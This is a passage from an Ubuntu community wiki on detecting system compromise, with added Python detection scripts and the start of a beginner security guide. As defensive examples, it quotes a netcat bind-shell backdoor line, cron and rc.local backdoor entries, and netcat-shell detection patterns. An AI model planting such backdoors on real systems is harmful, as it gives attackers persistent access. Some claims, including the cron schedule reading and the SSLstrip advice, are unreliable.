 * '''Partially sanitized''': If large chunks of time (more than 5 minutes) are unaccounted for in a log file while the machine was running, it is a safe bet that something has happened that someone didn't wish to be seen.

If you see any of the above signs it's time to do some further digging; it is safe to assume the machine may be compromised.
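To turn the tampering signs above into a repeatable check, here is an added example (not part of the original guide) that walks a classic syslog file and reports holes longer than five minutes as well as timestamps that run backwards. The log lines it uses are constructed, and the year is an assumption because the syslog format omits it.

```python
import re
from datetime import datetime, timedelta

# Classic syslog lines begin "Mon DD HH:MM:SS host ..." and carry no year, so
# the caller supplies one (the constructed default matches the sample below).
_TS = re.compile(r"^([A-Z][a-z]{2})\s+(\d{1,2}) (\d{2}:\d{2}:\d{2}) ")


def parse_timestamp(line, year=2011):
    """Return the datetime of a syslog line, or None for lines without a timestamp."""
    m = _TS.match(line)
    if not m:
        return None
    stamp = f"{year} {m.group(1)} {int(m.group(2)):02d} {m.group(3)}"
    return datetime.strptime(stamp, "%Y %b %d %H:%M:%S")


def find_gaps(lines, max_gap=timedelta(minutes=5)):
    """Return (previous_line, line, delta) for every pair of consecutive entries
    that are more than max_gap apart (partial sanitising) or that go backwards
    in time (a log copied over the original).  A year roll-over in December
    also shows up as a backwards step, so check the dates before panicking."""
    gaps = []
    prev_ts = prev_line = None
    for line in lines:
        ts = parse_timestamp(line)
        if ts is None:
            continue
        if prev_ts is not None:
            delta = ts - prev_ts
            if delta > max_gap or delta < timedelta(0):
                gaps.append((prev_line, line, delta))
        prev_ts, prev_line = ts, line
    return gaps


def gap_seconds(lines, max_gap=timedelta(minutes=5)):
    """Convenience wrapper: just the sizes of the gaps found, in seconds."""
    return [delta.total_seconds() for _, _, delta in find_gaps(lines, max_gap)]


# Constructed sample: the three phalanx entries quoted above, then a 13-minute
# hole in an otherwise busy log, then an entry whose clock runs backwards.
SAMPLE_SYSLOG = """\
Nov  7 21:27:40 dangertux-laptop kernel: [ 7549.229981] phalanx[27964]: segfault at 763405 ip 080490ee sp bfe940b0 error 4 in phalanx[8048000+5000]
Nov  7 21:28:09 dangertux-laptop kernel: [ 7577.979252] Program phalanx tried to access /dev/mem between 0->1f400000.
Nov  7 21:28:09 dangertux-laptop kernel: [ 7577.979292] phalanx[29055]: segfault at 763405 ip 080490ee sp bff465e0 error 4 in phalanx[8048000+5000]
Nov  7 21:41:30 dangertux-laptop CRON[30010]: (root) CMD (run-parts /etc/cron.hourly)
Nov  7 21:40:02 dangertux-laptop anacron[30021]: Job `cron.daily' terminated
"""

if __name__ == "__main__":
    for before, after, delta in find_gaps(SAMPLE_SYSLOG.splitlines()):
        kind = "BACKWARDS" if delta < timedelta(0) else f"GAP of {delta}"
        print(f"{kind}\n   {before[:60]}\n   {after[:60]}")
```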

Now let's take a look at some of your key logs and auditing methods for determining a system compromise.

=== Log File Viewer ===

Ubuntu provides a convenient graphical log viewer for newer users. It can be found in Administration > Log File Viewer (On 10.04.3 LTS). Otherwise all the log files mentioned can be found in {{{/var/log}}} and viewed using commands such as {{{cat}}}, {{{more}}}, {{{less}}}, {{{head}}}, and {{{tail}}}.

 {{http://dangertux.no-ip.org/downloads/logviewer.png}}

=== syslog ===

Syslog can be invaluable when trying to detect a compromised service or a possibly rooted system. It logs all events at the system level, including kernel behavior and activity. Often, when a service is compromised, the service crashes; the crash may or may not yield remote code execution, and you may notice your system behaving strangely. If you run several services on your machine, particularly services that are frequent targets of buffer-overflow attacks (applications that accept user input, either as files or as data), this file can help you determine whether a "crash" or segmentation fault has occurred. Note that a segfault in and of itself does not mean your system was compromised; sometimes an application segfaults all on its own. However, if you notice other unexplained phenomena, it is a good place to start.

Here is an example seg fault from the mysql service:

 {{{[Mon Aug 29 14:51:14 2011] [notice] child pid 22622 exit signal Segmentation fault (11)}}}

You can also notice naughty activity in syslog when a rootkit hooks kernel-space memory. Here is an example of the phalanx rootkit hooking the Linux kernel, with the last syslog entries associated with it:

 {{{Nov 7 21:27:40 dangertux-laptop kernel: [ 7549.229981] phalanx[27964]: segfault at 763405 ip 080490ee sp bfe940b0 error 4 in phalanx[8048000+5000]}}}<<BR>>
 {{{Nov 7 21:28:09 dangertux-laptop kernel: [ 7577.979252] Program phalanx tried to access /dev/mem between 0->1f400000.}}}<<BR>>
 {{{Nov 7 21:28:09 dangertux-laptop kernel: [ 7577.979292] phalanx[29055]: segfault at 763405 ip 080490ee sp bff465e0 error 4 in phalanx[8048000+5000]}}}

Syslog is also one of the most commonly tampered-with log files, so if you see any missing time or other anomalies, it is a good idea to start looking into whether a system compromise has occurred.

=== auth.log ===

This file contains logs of all user authentication. It is a great help in determining whether someone has gained unauthorized access to your system, either locally or remotely, and it becomes crucial in determining whether a brute-force attack against a remote administration service such as SSH has succeeded. Due to the incriminating nature of this log file, it will be one of the first logs a potential attacker sanitizes. As such, if this log appears to have been tampered with, it is almost a dead giveaway that your system has been compromised.

An example log snippet from a brute force against SSH might look like this:

 {{{Nov 7 19:39:36 dangertux-laptop sshd[1972]: Failed password for dangertux from 192.168.0.4 port 34163 ssh2}}}<<BR>>
 {{{Nov 7 19:39:42 dangertux-laptop sshd[1974]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.0.4}}}<<BR>>
 (these same entries about 5 million more times followed by this entry)<<BR>>
 {{{Nov 7 19:40:22 dangertux-laptop sshd[1985]: Failed password for dangertux from 192.168.0.4 port 44615 ssh2}}}<<BR>>
 {{{Nov 7 19:40:28 dangertux-laptop sshd[1987]: Accepted password for dangertux from 192.168.0.4 port 59713 ssh2}}}<<BR>>

Random guessing of usernames is also an indication of a brute-force attempt, particularly if service accounts and common usernames are being tried. The following are commonly brute-forced usernames; if you see these names trying to authenticate against your system, that is a good indicator that someone may be trying to brute-force one of your services (usually SSH).

 {{{admin}}}
 {{{administrator}}}
 {{{nagios}}}
 {{{squid}}}
 {{{www-admin}}}
 {{{root}}}
 {{{guest}}}
 {{{web_admin}}}
 {{{www-developer}}}
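As an added example that is not the page's own, the script below reads auth.log lines, counts sshd failures per remote host, flags the usernames from the list above and reports a login that succeeded after a flood of failures. The sample lines and the threshold of ten failures are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Usernames the page lists as commonly tried by brute-force tools.
COMMON_BRUTE_FORCE_USERS = {"admin", "administrator", "nagios", "squid", "www-admin",
                            "root", "guest", "web_admin", "www-developer"}

# sshd writes "invalid user" before names that do not exist on the system.
FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port \d+")
# The pam_unix "authentication failure" line duplicates each Failed password
# line, so it is deliberately not counted.


def analyze_auth_log(lines, threshold=10):
    """Summarise sshd activity per remote host.

    suspicious is set when a host produced at least `threshold` failures or
    tried one of the commonly brute-forced usernames; accepted_after_failures
    records a login that succeeded after such a flood, the pattern quoted above."""
    failures = Counter()
    users = defaultdict(set)
    accepted = {}
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, host = m.groups()
            failures[host] += 1
            users[host].add(user)
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(2)] >= threshold:
            accepted[m.group(2)] = m.group(1)
    report = {}
    for host in set(failures) | set(accepted):
        common = users[host] & COMMON_BRUTE_FORCE_USERS
        report[host] = {
            "failures": failures[host],
            "users_tried": sorted(users[host]),
            "common_names": sorted(common),
            "accepted_after_failures": accepted.get(host),
            "suspicious": failures[host] >= threshold or bool(common),
        }
    return report


# Constructed sample modelled on the snippet above: 30 failures for dangertux
# from 192.168.0.4 followed by a success, a name-guessing run from 10.0.0.9,
# and one clean key-based login that must not be reported.
SAMPLE_AUTH_LOG = [
    f"Nov  7 19:39:{36 + i % 24:02d} dangertux-laptop sshd[{1972 + i}]: Failed password "
    f"for dangertux from 192.168.0.4 port {34163 + i} ssh2"
    for i in range(30)
] + [
    "Nov  7 19:40:28 dangertux-laptop sshd[1987]: Accepted password for dangertux from 192.168.0.4 port 59713 ssh2",
    "Nov  7 20:02:11 dangertux-laptop sshd[2100]: Failed password for invalid user admin from 10.0.0.9 port 50102 ssh2",
    "Nov  7 20:02:14 dangertux-laptop sshd[2102]: Failed password for root from 10.0.0.9 port 50108 ssh2",
    "Nov  7 20:02:17 dangertux-laptop sshd[2104]: Failed password for invalid user nagios from 10.0.0.9 port 50111 ssh2",
    "Nov  7 20:05:00 dangertux-laptop sshd[2110]: Accepted publickey for dangertux from 192.168.0.20 port 41000 ssh2",
]

if __name__ == "__main__":
    for host, info in sorted(analyze_auth_log(SAMPLE_AUTH_LOG).items()):
        print(host, info)
```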


=== ufw.log ===

This is your Uncomplicated Firewall log. Blocked traffic will show up here. If you have configured strong firewall rules, you may notice UFW blocking traffic to an unauthorized port. Malicious applications often use random, oddball ports to try to obscure their existence as they make a remote connection back to their owner. If your firewall's outbound rules are configured properly and the creator of the malicious application wasn't very diligent, you should be able to notice the traffic being blocked. Here is an example of UFW blocked traffic:

 {{{Nov 5 14:46:18 dangertux kernel: [ 2080.258253] [UFW BLOCK] IN= OUT=eth0 SRC=192.168.0.4 DST=224.0.0.251 LEN=67 TOS=0x00 PREC=0x00 TTL=255 ID=0 DF PROTO=UDP SPT=5353 DPT=5353 LEN=47}}}

Here we see blocked outbound traffic. It is UDP originating at port 5353 bound for port 5353. It is multicast traffic, as it is bound for 224.0.0.251, which is a multicast address. It is important to pay attention to the destination and source ports here, as there are quite a few ports that are frequented by malicious applications. Here are a few examples of the more common ones:

 1337
 4141
 4444
 6666
 7777
 9999
 13337
 31337
 44444

There are others but if you start seeing odd traffic on any unregistered port, there is a chance that it is malicious if you did not authorize it.

If you are using iptables instead of UFW, the same can be seen in either {{{syslog}}} or {{{kern.log}}}.

=== Watching Network Traffic ===

When being mindful of your system's security it is important to watch network traffic. Malicious applications or unauthorized access often lead to the opening of a connection that is equally malicious and unauthorized. A quick way to view your active connections, both inbound and outbound, is the netstat command. Netstat gives you a near real-time look at the connections your system has.

For instance, the command {{{sudo watch netstat -anlp}}} will provide a fairly verbose output for netstat that updates every 2 seconds.

Here is example output from that command:

 {{http://dangertux.no-ip.org/downloads/cleannetstat.png}}


Let's take a look at what that means for us. The first column tells us the protocol. Recv-Q and Send-Q show how much data is queued for the connection and aren't really that important here. The local address is the listening address of the service, here 127.0.0.1, and the :631 indicates we are listening on port 631. The Foreign Address is the address we are connected to; 0.0.0.0:* means any host, any port. We are in state LISTEN, which means we do not have an active connection but are waiting for one. The process ID is 1122 and the program is the Common Unix Printing System (CUPS) daemon. Now here is an example of output that might be considered slightly more malicious in nature:


 {{http://dangertux.no-ip.org/downloads/compromisednetstat.png}}

This output indicates a connection to a service running {{{/bin/sh}}} on port 31337. This is a nearly direct indication that this machine has been compromised.
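The two checks above (the ufw.log entry and the netstat listing) can be automated. The added example below, which is not from the original page, parses [UFW BLOCK] lines and netstat -anlp rows and flags the watch-list ports and shell-owned sockets described above; the sample log lines and netstat rows are constructed, and the list of shell programs is an assumption.

```python
import re

# Ports the page lists as frequented by malicious applications.
SUSPICIOUS_PORTS = {1337, 4141, 4444, 6666, 7777, 9999, 13337, 31337, 44444}
# Programs that have no business owning a network socket on a desktop (assumption).
SHELL_PROGRAMS = {"sh", "bash", "dash", "nc", "netcat"}

_KV = re.compile(r"(\w+)=(\S*)")


def parse_ufw_block(line):
    """Return the KEY=value fields of a [UFW BLOCK] kernel log line, or None.
    Bare flags such as DF or SYN carry no '=' and are skipped; LEN appears twice
    (IP header, then UDP/TCP), so the dict keeps the later value."""
    if "[UFW BLOCK]" not in line:
        return None
    fields = dict(_KV.findall(line.partition("[UFW BLOCK]")[2]))
    fields["direction"] = "outbound" if fields.get("OUT") else "inbound"
    return fields


def ufw_findings(lines):
    """Blocked packets whose source or destination port is on the watch list."""
    hits = []
    for line in lines:
        f = parse_ufw_block(line)
        if not f:
            continue
        spt, dpt = int(f.get("SPT") or 0), int(f.get("DPT") or 0)
        if spt in SUSPICIOUS_PORTS or dpt in SUSPICIOUS_PORTS:
            hits.append({"direction": f["direction"], "proto": f.get("PROTO"),
                         "src": f.get("SRC"), "spt": spt, "dst": f.get("DST"), "dpt": dpt})
    return hits


def _port(addr):
    """'127.0.0.1:631' -> 631; '0.0.0.0:*' -> None (any port)."""
    port = addr.rpartition(":")[2]
    return int(port) if port.isdigit() else None


def netstat_findings(lines):
    """Rows of `netstat -anlp` output that involve a watch-list port or a shell.
    tcp rows carry a State column, udp rows do not, hence the two layouts."""
    hits = []
    for line in lines:
        p = line.split()
        if not p or p[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        if p[0].startswith("tcp"):
            local, foreign, state, pid_prog = p[3], p[4], p[5], p[6]
        else:
            local, foreign, state, pid_prog = p[3], p[4], "", p[5]
        program = pid_prog.partition("/")[2]
        reasons = []
        if _port(local) in SUSPICIOUS_PORTS or _port(foreign) in SUSPICIOUS_PORTS:
            reasons.append("watch-list port")
        if program in SHELL_PROGRAMS:
            reasons.append("shell owns the socket")
        if reasons:
            hits.append({"proto": p[0], "local": local, "foreign": foreign,
                         "state": state, "program": program, "reasons": reasons})
    return hits


# Constructed samples: the mDNS block quoted above (harmless) and an outbound
# connection attempt to port 31337 that the firewall stopped.
SAMPLE_UFW_LOG = """\
Nov  5 14:46:18 dangertux kernel: [ 2080.258253] [UFW BLOCK] IN= OUT=eth0 SRC=192.168.0.4 DST=224.0.0.251 LEN=67 TOS=0x00 PREC=0x00 TTL=255 ID=0 DF PROTO=UDP SPT=5353 DPT=5353 LEN=47
Nov  5 14:52:03 dangertux kernel: [ 2425.118270] [UFW BLOCK] IN= OUT=eth0 SRC=192.168.0.4 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=31842 DF PROTO=TCP SPT=47211 DPT=31337 WINDOW=14600 RES=0x00 SYN URGP=0
"""

# Constructed netstat rows: the CUPS listener discussed above, then the
# /bin/sh-on-31337 situation the second screenshot shows.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1122/cupsd
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN      2417/sh
tcp        0      0 192.168.0.10:31337      192.168.0.4:51320       ESTABLISHED 2417/sh
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           1134/avahi-daemon
"""

if __name__ == "__main__":
    for hit in ufw_findings(SAMPLE_UFW_LOG.splitlines()) + netstat_findings(SAMPLE_NETSTAT.splitlines()):
        print(hit)
```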


=== rkhunter & chkrootkit ===

rkhunter and chkrootkit are two applications designed to aid in the detection of a compromised system. They do two things. First, they check the integrity of commonly hooked system files. These files are often backdoored by an attacker in order to gain special access or glean credentials from a compromised system. An example of a frequently backdoored command in the Linux world is {{{/bin/su}}}.

It is important to understand that rkhunter and chkrootkit work best when given a benchmark to compare against, meaning that you run them right after your initial installation so that they can record a "baseline" of what your system should look like. That way, if changes are made, they will be able to detect the changes as potentially unauthorized. Note that updates can sometimes cause false positives because of the way these applications work.

The second thing these applications do is attempt to determine whether your system has been compromised with a known (signatured) rootkit. They look for files and processes associated with known rootkits, as well as the known malicious communication ports associated with them. Additionally, they look for hidden PIDs and hidden TCP ports, as these are often a sign of rootkit-like activity.
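As an added example of the baseline idea (not rkhunter's or chkrootkit's own code), the script below records hashes, sizes and permission bits of a watch list of binaries and reports what changed. The watch list beyond /bin/su and the demo's fake binaries are constructed assumptions.

```python
import hashlib
import os
import tempfile

# /bin/su is the page's example; the rest are the usual targets (assumption).
DEFAULT_WATCHLIST = ["/bin/su", "/bin/login", "/bin/ls", "/bin/ps", "/bin/netstat", "/usr/bin/sudo"]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths=DEFAULT_WATCHLIST):
    """Record hash, size and permission bits of every listed file that exists.
    Run this right after installation and again after each package upgrade,
    which legitimately changes the binaries (the false positives noted above)."""
    baseline = {}
    for p in paths:
        if os.path.isfile(p):
            st = os.stat(p)
            baseline[p] = {"sha256": sha256_file(p), "size": st.st_size, "mode": st.st_mode}
    return baseline


def compare_baseline(baseline):
    """Return {path: [changed attributes]}; a vanished file reports ['missing'].
    A changed mode with an unchanged hash is worth a look too: setting the
    setuid bit on a copied binary is a classic way to keep root access."""
    changes = {}
    for p, recorded in baseline.items():
        if not os.path.isfile(p):
            changes[p] = ["missing"]
            continue
        current = build_baseline([p])[p]
        diff = [k for k in ("sha256", "size", "mode") if current[k] != recorded[k]]
        if diff:
            changes[p] = diff
    return changes


def demo():
    """Constructed walk-through on a temporary directory standing in for /bin:
    baseline two fake binaries, then trojan one and delete the other."""
    with tempfile.TemporaryDirectory() as d:
        su, ls = os.path.join(d, "su"), os.path.join(d, "ls")
        for p in (su, ls):
            with open(p, "wb") as f:
                f.write(b"\x7fELF fake " + os.path.basename(p).encode())
            os.chmod(p, 0o755)
        baseline = build_baseline([su, ls])
        with open(su, "ab") as f:            # a "credential logger" appended to su
            f.write(b" credential logger")
        os.chmod(su, 0o4755)                 # and the setuid bit switched on
        os.remove(ls)
        return {os.path.basename(p): v for p, v in compare_baseline(baseline).items()}


if __name__ == "__main__":
    print(demo())   # {'su': ['sha256', 'size', 'mode'], 'ls': ['missing']}
```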


=== Bash Profiles ===

Yet another method by which an attacker can maintain access to a compromised machine is to load a backdoor at login. These can often be found in the following places:

 {{{/home/username/.bash_profile}}}<<BR>>
 {{{/home/username/.bashrc}}}<<BR>>
 {{{/home/username/.profile}}}<<BR>>

There are other locations, but these are the three most targeted. An example entry that might be found in a modified .profile is:

 {{{nc -l -p 4444 -e '/bin/sh' &}}}<<BR>>

This would start a netcat listener that executes a shell when an attacker connects. It persists because it is in your {{{.profile}}}, which is read whenever a login shell starts.

=== Cron Jobs ===

Another common way an attacker will maintain access to a compromised system is to add a cron job with a backdoor. This backdoor might be a simple netcat listener or it could be something else. In any case, if you suspect that you have been compromised, checking {{{cron}}} is a good idea.

The following output from {{{sudo crontab -l}}} indicates that something not so kosher is happening every 5 hours.

 {{{# m h dom mon dow command}}}<<BR>>
 {{{* 5 * * * /home/dangertux/reverse_tcp}}}<<BR>>

Additional places to check for cron jobs being placed are as follows:

 {{{/etc/cron.daily}}}<<BR>>
 {{{/etc/cron.weekly}}}<<BR>>
 {{{/etc/cron.hourly}}}<<BR>>
 {{{/etc/cron.monthly}}}<<BR>>
 {{{/etc/cron.d}}}<<BR>>

=== Tampered Environment & LD_PRELOAD ===

Another way a system may be backdoored is by adding the {{{LD_PRELOAD=}}} variable to the environment. It makes the dynamic linker load the named library into every program before anything else, and such libraries are often used to hook system calls and escalate privileges on a system. You can view your current environment with the {{{printenv}}} command. (Note that each user has their own environment.)

Additionally, if you suspect this you may wish to check {{{/etc/ld.so.conf.d}}} for any malicious links.

=== Hooked Run Level Scripts ===

An attacker will also commonly hook {{{rc.local}}} on a root-compromised machine in order to maintain their presence on it.

If we look at the contents of our {{{/etc/rc.local}}} file we may find there is something not quite right on our compromised machine. An example entry in this file might be something along these lines:

 {{{sh '/usr/local/lib/.bad/libowned-4.0.0.so' &}}}

This indicates that whatever {{{libowned-4.0.0.so}}} is, it is being executed at boot time. By default this file contains nothing but a single {{{exit 0}}} line, so if you see strange additions here, particularly something as obvious as this line, it is safe to say your machine may be compromised.

Additional areas to check for potentially malicious scripts are the following directories:

 {{{/etc/rc0.d}}}<<BR>>
 {{{/etc/rc1.d}}}<<BR>>
 {{{/etc/rc2.d}}}<<BR>>
 {{{/etc/rc3.d}}}<<BR>>
 {{{/etc/rc4.d}}}<<BR>>
 {{{/etc/rc5.d}}}<<BR>>
 {{{/etc/rc6.d}}}<<BR>>
 {{{/etc/init.d}}}<<BR>>
 {{{/etc/network/}}} (in particular, the interface pre-up and up scripts may be tampered with)<<BR>>
 
=== Additional Users ===

When a system is compromised, an attacker will often create an additional user so that they retain access even if you change your password. If you suspect a compromise has occurred, you can and should check for the creation of additional users.

You may notice something similar to the following in your {{{auth.log}}} file if a user has been created.

 {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: new user: name=reallybadguy, UID=1001, GID=1002, home=/dev/null, shell=/bin/sh}}} <<BR>>
 {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: add 'reallybadguy' to group 'admin'}}} <<BR>>
 {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: add 'reallybadguy' to shadow group 'admin'}}}<<BR>>

In your {{{/etc/passwd}}} file you may also notice an entry similar to this:

 {{{reallybadguy:x:1001:1002::/dev/null:/bin/sh}}}
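The checks described in the Bash Profiles, Cron Jobs, LD_PRELOAD, run-level script and Additional Users sections above can be run together. The added example below (not from the original guide) does that against a directory tree, so it can be exercised on a constructed copy of the page's own entries; the detection patterns, the list of untrusted directories and the sample files are assumptions.

```python
import os
import re
import tempfile

# Patterns taken from the examples above: a netcat listener handing out a
# shell, cron or rc.local commands living in user-writable or hidden ("/.bad/")
# directories, and an account with an interactive shell but a bogus home.
LISTENER = [re.compile(r"\bnc\b.*\s-l\b"), re.compile(r"-e\s+'?/bin/(ba|da)?sh")]
UNTRUSTED_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_DIR = re.compile(r"/\.[^/]+/")
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}


def _lines(path):
    """Lines of a text file, or [] when it does not exist."""
    try:
        with open(path, errors="replace") as f:
            return [line.rstrip("\n") for line in f]
    except OSError:
        return []


def audit_persistence(root="/", crontab_text="", env=None):
    """Return (where, line, reason) for each indicator found under `root`.
    `crontab_text` is the output of `sudo crontab -l`; `env` defaults to the
    live environment.  `root` lets the checks run on a constructed tree."""
    env = os.environ if env is None else env
    findings = []
    # 1. Shell start-up files of every home directory.
    homes = os.path.join(root, "home")
    for user in (os.listdir(homes) if os.path.isdir(homes) else []):
        for rc in (".bash_profile", ".bashrc", ".profile"):
            path = os.path.join(homes, user, rc)
            for line in _lines(path):
                if any(pat.search(line) for pat in LISTENER):
                    findings.append((path, line, "listener started from shell start-up file"))
    # 2. Crontab commands run from user-writable or hidden directories.
    for line in crontab_text.splitlines():
        fields = line.split(None, 5)
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0].startswith("@"):          # "@reboot cmd" has one time field
            cmd = fields[1] if len(fields) > 1 else ""
        else:                                  # the usual form has five
            cmd = fields[5] if len(fields) == 6 else ""
        if cmd.startswith(UNTRUSTED_DIRS) or HIDDEN_DIR.search(cmd):
            findings.append(("crontab", line, "cron command in user-writable or hidden directory"))
    # 3. A stock rc.local holds nothing but comments and "exit 0".
    rc_local = os.path.join(root, "etc", "rc.local")
    for line in _lines(rc_local):
        s = line.strip()
        if s and not s.startswith("#") and s != "exit 0":
            findings.append((rc_local, line, "unexpected command in rc.local"))
    # 4. Accounts: a second UID 0, or an interactive shell with a bogus home.
    for line in _lines(os.path.join(root, "etc", "passwd")):
        f = line.split(":")
        if len(f) != 7:
            continue
        name, uid, home, shell = f[0], f[2], f[5], f[6]
        if uid == "0" and name != "root":
            findings.append(("/etc/passwd", line, "extra UID 0 account"))
        elif shell in INTERACTIVE_SHELLS and not os.path.isdir(os.path.join(root, home.lstrip("/"))):
            findings.append(("/etc/passwd", line, "interactive shell with bogus home directory"))
    # 5. LD_PRELOAD in the environment or the system-wide /etc/ld.so.preload.
    if env.get("LD_PRELOAD"):
        findings.append(("environment", "LD_PRELOAD=" + env["LD_PRELOAD"], "LD_PRELOAD set"))
    for line in _lines(os.path.join(root, "etc", "ld.so.preload")):
        if line.strip() and not line.startswith("#"):
            findings.append(("/etc/ld.so.preload", line, "library preloaded into every process"))
    return findings


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed tree carrying the page's own example entries, plus a clean
    cron job and the root account, which must not be reported."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "root"))
        _write(d, "home/dangertux/.profile", "export PATH=$HOME/bin:$PATH\nnc -l -p 4444 -e '/bin/sh' &\n")
        _write(d, "etc/rc.local", "#!/bin/sh -e\nsh '/usr/local/lib/.bad/libowned-4.0.0.so' &\nexit 0\n")
        _write(d, "etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"
                                "dangertux:x:1000:1000::/home/dangertux:/bin/bash\n"
                                "reallybadguy:x:1001:1002::/dev/null:/bin/sh\n")
        cron = "# m h dom mon dow command\n0 3 * * * /usr/bin/apt-get update\n* 5 * * * /home/dangertux/reverse_tcp\n"
        return audit_persistence(d, crontab_text=cron,
                                 env={"LD_PRELOAD": "/usr/local/lib/.bad/libowned-4.0.0.so"})


if __name__ == "__main__":
    for where, line, reason in demo():
        print(f"{reason}: {where}: {line}")
```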
<<BR>><<BR>>
-----
This Wiki was birthed on the Ubuntu Forums by [[http://ubuntuforums.org/member.php?u=1418836|MrLeek]] and [[http://ubuntuforums.org/member.php?u=1455355|Ms. Daisy]]. Contributions came from [[http://ubuntuforums.org/member.php?u=1322416|Dangertux]], [[http://ubuntuforums.org/member.php?u=946893|OpSecShellShock]], [[http://ubuntuforums.org/member.php?u=1317912|haqking]], Thewhistlingwind, dFlyer, vasa1, [[http://ubuntuforums.org/member.php?u=571173|Olle Wiklund]], [[http://ubuntuforums.org/member.php?u=923868|CharlesA]] and a Mystery Guy ;)

Basic Ubuntu Security Guide, Desktop Edition

Who Did We Write This For?

Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.

This guide is intended for the typical, average home user that is in the process of learning how to use Ubuntu. So if you just surf the net, play games (on-line & off-line), do on-line banking, education...then you are the intended audience. However if you are running a network server (especially one that is accessed via the Internet) or if you use Ubuntu in your corporate environment (or simply work from home) then the advice you need is more specialized and beyond the scope of this guide. If you don't know whether you are running a server or not, then read this.


The most basic set of rules

If you're a simple desktop user who only uses his computer for the most ordinary things, then this is the basic rule set:
1. immediately install security updates when you're notified;
2.  do not install antivirus, as you *really* don't need it in Linux, unless you share files with Windows;
3. enable the firewall (sudo ufw enable) without further tweaks;
4. stick to the official repos as much as possible, and only deviate from them when strictly necessary and with much caution;
5. keep Java (both openJDK and Oracle Java) disabled by default in your browser, and only enable it when needed;
6. use Wine with caution;
7. and most important of all: use your common sense. The biggest security threat is generally found between keyboard and chair.

If you have higher security needs, then read on.

Security Tools and Concepts That Are Easy to Use

In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and (once configured) require little interaction. We will also discuss general security concepts that are easy to build into your daily computer use. There is already a lot of security information in the Ubuntu Wikis and in stickies on the Ubuntu Forums. There are some great resources there; in fact one of the best guides is linked here. But a lot of that material will seem complex to the new Ubuntu user, so the goal of this guide is to take the existing material and simplify it, making it possible to bridge the gap.

Your Tolerance for Risk

We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. It is up to the individual user to determine what his tolerance for risk is. This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system, and you can evaluate them and determine how those risks relate to your personal situation.

Linux Vulnerabilities

The majority of new users are coming from Windows environments, where security focuses mostly on anti-virus software. To understand security on Ubuntu, you must shift your thinking from this point of view. In the following bullets, we're going to analyze what threats actually affect you as an Ubuntu user.

  • Myth: If I install an anti-virus program I'll be fine.

  • Reality: At the time of writing, there are no known viruses on the big bad web designed to target Linux. A few targeting Windows can execute in a manner that could allow compromise of a Linux system via an interpreter layer like Wine. Very few people recommend existing anti-virus software for Linux machines, in part because there are few decent free anti-malware solutions available. Enterprise class solutions are good, but the consumer-grade products aren't on par with their Windows counterparts enough to warrant their use. Moreover, if you focus entirely on viruses then you are ignoring the vast majority of real threats to your Ubuntu machine.

  • Myth: Security through obscurity keeps me safe.

  • Reality: It's a favoured argument from Linux supporters, but Linux/Ubuntu is not that obscure to “crackers”. They may be obscure to you or your friends; however, there are many who know how to exploit Linux vulnerabilities just as easily as those of Windows, Mac OSX, Solaris, AIX, or any other operating system. The best defence is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.

  • Myth: I can browse however I want to because malware on the web is mostly designed for Windows.

  • Reality: While the majority of malware does target Windows, this statement overlooks the fact that an entire spectrum of web based attack vectors exist that work on any operating system. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the browser security section.

  • Myth: I don't need to use fancy browser add-ons when using public access wifi because I use Ubuntu.

  • Reality: An absurd statement. Most attacks carried out on public wifi include several varieties of man-in-the-middle attack. If you want to use public wifi, doing anything more than trivial on it is highly discouraged unless you are an advanced user and you know how to set up a virtual private network (VPN), a VPN via Secure Shell (SSH), or use Secure Sockets Layer (SSL) in conjunction with SSLstrip.

  • Myth: I don't need a firewall because Ubuntu has no open ports by default.

  • Reality: This is a matter of risk tolerance. Added protection, particularly that which takes only a few minutes to set up, is always worth it. Firewalls are discussed in more depth later in this document.

  • Myth: Windows malware can not compromise Ubuntu.

